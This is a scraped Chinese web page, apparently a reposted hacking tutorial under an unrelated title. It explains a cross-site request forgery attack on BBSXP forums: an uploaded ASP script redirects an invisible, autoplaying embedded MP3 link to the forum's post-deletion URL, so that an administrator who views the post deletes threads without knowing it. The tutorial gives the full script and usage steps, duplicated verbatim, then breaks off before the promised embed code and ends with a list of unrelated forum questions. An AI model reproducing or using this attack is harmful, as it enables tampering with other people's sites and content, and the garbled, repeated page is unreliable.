什么是分类自变量:让有权限的人帮你删帖子!MP3跨站
来源:百度文库 编辑:中财网 时间:2024/04/28 23:43:01
神秘小强&1943
我们知道,成熟的论坛系统都在用户提交帖子数据的时候对敏感HTML代码进行了转换、过滤或删除,这样就不能嵌入脚本来实现跨站攻击。但恰恰是成熟的论坛都提供提交多媒体信息,也就是可以嵌入MP3音频文件或者FLASH文件,关于FLASH的跨站这里就不说了,今天主要带大家探讨下MP3的跨站攻击。就拿某个版本的BBSXP为例,让管理员或斑竹神不知鬼不觉的帮你删除任何你想删除的帖子(条件是他要看你的帖子):
首先要找到删除帖子的链接:http://bbs.yuzi.net/DelPost.asp?ThreadID=763703&PostID=1326482
ThreadID是帖子的主题编号,PostID是该主题中回复贴的编号,如果PostID省略则删除整个主题。
下面我们就写一个ASP文件:
<%@LANGUAGE="JavaScript"%>
<%
/*
mp3请求链接样式:http://www.smxiaoqiang.cn/tools/music.asp?mp3=763703x1326482xhelloGirl.mp3
红色部分为请求参数,包含主题编号和回帖编号,以字母x分隔,这样做的目的是因为论坛系统对&进行了过滤,不能同时传递多个参数,所以要把参数合并为一个参数,在后台重新分割。
*/
var music=Request.QueryString("mp3");//获取MP3请求链接传递过来的参数
var id1,id2,id3;
mySplit();//对传递过来的参数进行分割处理
var myLink="";
if(id3!="helloGirl.mp3"){
Response.write("");//helloGirl用于验证参数,防止非法调用,无其他意义
}
else{
myLink+="ThreadID="+id1;
if(id2!="0") myLink+="&PostID="+id2;//如果传来的PostID为0,便是要删除整个主题,则省略PostID
myLink="http:\/\/bbs.yuzi.net\/DelPost.asp?"+myLink;//构造删除帖子的链接
Response.redirect(myLink);//将mp3链接转向删除帖子的链接,执行删除帖子动作
//Response.End();
}
%>
好了,ASP函数写好了,保存为music.asp,接着就是把这个ASP文件上传到你自己的域名空间好引用。
然后就是去该论坛注册个帐户,找个管理员最容易去看的帖子回复一下,嵌入一个MP3文件,地址样式为http://smxiaoqiang.cn/tools/music.asp?mp3=35077x0xhelloGirl.mp3,将长宽都设为0,设置为自动播放。(如果你要删除多个帖子可以嵌入多个MP3)
HTML或UBB代码如下:
我们知道,成熟的论坛系统都在用户提交帖子数据的时候对敏感HTML代码进行了转换、过滤或删除,这样就不能嵌入脚本来实现跨站攻击。但恰恰是成熟的论坛都提供提交多媒体信息,也就是可以嵌入MP3音频文件或者FLASH文件,关于FLASH的跨站这里就不说了,今天主要带大家探讨下MP3的跨站攻击。就拿某个版本的BBSXP为例,让管理员或斑竹神不知鬼不觉的帮你删除任何你想删除的帖子(条件是他要看你的帖子):
首先要找到删除帖子的链接:http://bbs.yuzi.net/DelPost.asp?ThreadID=763703&PostID=1326482
ThreadID是帖子的主题编号,PostID是该主题中回复贴的编号,如果PostID省略则删除整个主题。
下面我们就写一个ASP文件:
<%@LANGUAGE="JavaScript"%>
<%
/*
mp3请求链接样式:http://www.smxiaoqiang.cn/tools/music.asp?mp3=763703x1326482xhelloGirl.mp3
红色部分为请求参数,包含主题编号和回帖编号,以字母x分隔,这样做的目的是因为论坛系统对&进行了过滤,不能同时传递多个参数,所以要把参数合并为一个参数,在后台重新分割。
*/
var music=Request.QueryString("mp3");//获取MP3请求链接传递过来的参数
var id1,id2,id3;
mySplit();//对传递过来的参数进行分割处理
var myLink="";
if(id3!="helloGirl.mp3"){
Response.write("");//helloGirl用于验证参数,防止非法调用,无其他意义
}
else{
myLink+="ThreadID="+id1;
if(id2!="0") myLink+="&PostID="+id2;//如果传来的PostID为0,便是要删除整个主题,则省略PostID
myLink="http:\/\/bbs.yuzi.net\/DelPost.asp?"+myLink;//构造删除帖子的链接
Response.redirect(myLink);//将mp3链接转向删除帖子的链接,执行删除帖子动作
//Response.End();
}
%>
好了,ASP函数写好了,保存为music.asp,接着就是把这个ASP文件上传到你自己的域名空间好引用。
然后就是去该论坛注册个帐户,找个管理员最容易去看的帖子回复一下,嵌入一个MP3文件,地址样式为http://smxiaoqiang.cn/tools/music.asp?mp3=35077x0xhelloGirl.mp3,将长宽都设为0,设置为自动播放。(如果你要删除多个帖子可以嵌入多个MP3)
HTML或UBB代码如下:
用户组权限:你所属的用户组每日最多能发 10 篇帖子
如何设置帖子权限
MP3格式的你让我受伤
怎样让更多的人看到我的帖子?
贴吧里的帖子怎么才可以三掉啊~!我让吧主帮我三了,但还是有这是怎么回事啊~!还有怎么链接那个贴子的名字啊
如何让更多人看到我的帖子
怎样设置win2000服务器的ftp和web的权限让访问的人要验证才可登陆到你的ftp或web里
有什么网站可以免费送你容量的?就是让你放东西进去帮你保存的?
如果有一家diy手工店可以帮你卖出你在那里diy的东西,你会不会让它帮你卖呢?
有吸引人的帖子吗?
有好的帖子!!!
你看到的百度贴吧哪个帖子帖子最多?
有谁知道上海市杨浦区有没有让自己设计包包然后帮你做的地方?
请有没有,张信哲-让你不后悔的歌词,mp3下载地址,谢谢!
如何让自己的帖子倍受关注?
如何让自己的帖子置顶?
怎么让帖子的回复率高?
怎样才能让别人看到我的帖子
如何让别人看不到自己的帖子
我的MP3没有使用权限
明知道让你走的太早 还要帮你买对车票 有谁知道我的神分颠倒
如果有一个公司可以帮你完成一些很浪费时间的工作,你愿不愿意让他们帮着做?
如何在论坛里进行"帖子操作"即,只让楼主看见你的留言?
不想让别人搜索出我的帖子,有保护的功能吗?